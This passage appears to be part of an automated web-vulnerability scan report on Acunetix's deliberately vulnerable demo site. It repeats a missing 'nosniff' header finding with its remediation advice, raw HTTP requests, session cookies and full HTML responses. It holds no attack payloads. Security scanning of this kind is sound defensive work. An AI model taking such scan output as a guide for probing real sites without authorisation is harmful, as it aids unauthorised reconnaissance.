          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        29. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (414 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2
          Content-Length: 10975
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (10975 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 30429
          
          
          Response body (30429 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). 
This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            
What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            
More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. 
Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        30. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
